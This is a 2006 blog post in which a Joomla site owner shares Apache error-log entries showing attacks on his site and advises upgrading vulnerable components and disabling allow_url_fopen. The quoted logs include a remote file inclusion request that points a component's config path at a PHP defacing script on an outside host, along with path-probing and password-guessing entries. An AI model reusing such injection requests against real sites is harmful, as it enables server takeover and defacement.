Main Menu

Recommended sites

Add to MyYahoo!
Subscribe in NewsGator Online
Add to Newsburst
Add to Google
Add to My AOL
Add to Pluck
Subscribe in FeedLounge
Add to Windows Live
Add to NetVibes
Subscribe in Rojo
Subscribe in Bloglines
Add to MyMSN
Add to Plusmo for your cellphone
Add to PageFlakes
Add to Technorati
Add to BlinkBits
Hackers are using scripts to hack my page... Print E-mail
User Rating: / 0
PoorBest 
Thursday, 17 August 2006 21:38

 I've already tried to reduce the surface of attack of my homepage by removing all un-needed components, modules, mambots but here is below what I've found into the log files...

Hackers trying remote code injection

were  found more than one time in apache error.log

[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

Remember You should ASAP update the following components to their latest version:
  • com_securityimages < 3.0.5 use at least a version  > 3.0.6
  • com_hashcash < 1.2.1 use at least a version  > 1.2.2
  • com_bayesiannaivefilter has been developed but never release as a component, but it is still available at Joomla forge developer tree.
This attack is trying to execute a scripts, locate at http://recon.reschat.dk/images/gallery/tool25.txt. If You go there, You'll find that th script is readable and contains a header.
Defacing Tool 2.0 by xxxxxx
Defacing Tool 2.0 by xxxxxxx" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites.

Solutions:
  1. For com_bayesiannaivefilter sorry guys but I do not have this plugins nor it has ever been released in the wild. com_securityimages or com_hashcash, just Upgrade!
  2. If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable. /etc/php.ini  allow_url_fopen = Off
 Hackers trying to access well known PHP files

each lines below at least more than 500 times...in 1 day

[Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

Hacker trying to access  files that do not exist
  • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
  • wiki/administrator/
  • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
  • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
  • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php
which look like programs brute forcing with a set of rules some paths searching well known vulnerability

Some strange attempts...

[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com

Comments
Add New Search RSS
messy
Guest (84.74.93.xxx) 2006-08-24 21:29:21
switching allow_url_fopen = Off does come with some side effects though, some
components won't work and afaik it brings some Joomla cache problems.
The best
thing to do as afaik is to keep everything up-to-date and read the Joomla forum,
the security one, the htaccess part is very good and easy to do for
anyone.

You make some great addons for Joomla Cedric but no offence but your
website is very chaotic and half of it isn't working so maybe this is partly
debit to you being under attack. Chaos usually means there must be lose
ends.

But as I said before, your a credit to the Joomla development, and I
really appreciate and admire your work!

--------Cedric Walter --------
A lot
of ip get currently blacklisted by mod_evasive, spamd process are killing my
server cpu (spam assasin process), I have port scan and a lot of things which
have nothing to do with joomla and the number of patch i can apply, It seems
some hac...
Reply | Quote
0 0
Write comment
Name:
Email:
 
Title:
UBBCode:
[b] [i] [u] [url] [quote] [code] [img] 
 
:):grin;)8):p:roll:eek:upset:zzz:sigh:?:cry
:(:x
Please input the anti-spam code that you can read in the image.

3.20 Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."

< Prev   Next >
Last Updated ( Thursday, 17 August 2006 21:47 )
 

Another articles:


Content View Hits : 2417016

Enter Amount:

demo.waltercedric.com.jpg
demo2.waltercedric.com.jpg
forums.waltercedric.com.jpg
bugs.waltercedric.com.jpg
gallery.waltercedric.com.jpg
wiki.waltercedric.com.jpg

Popular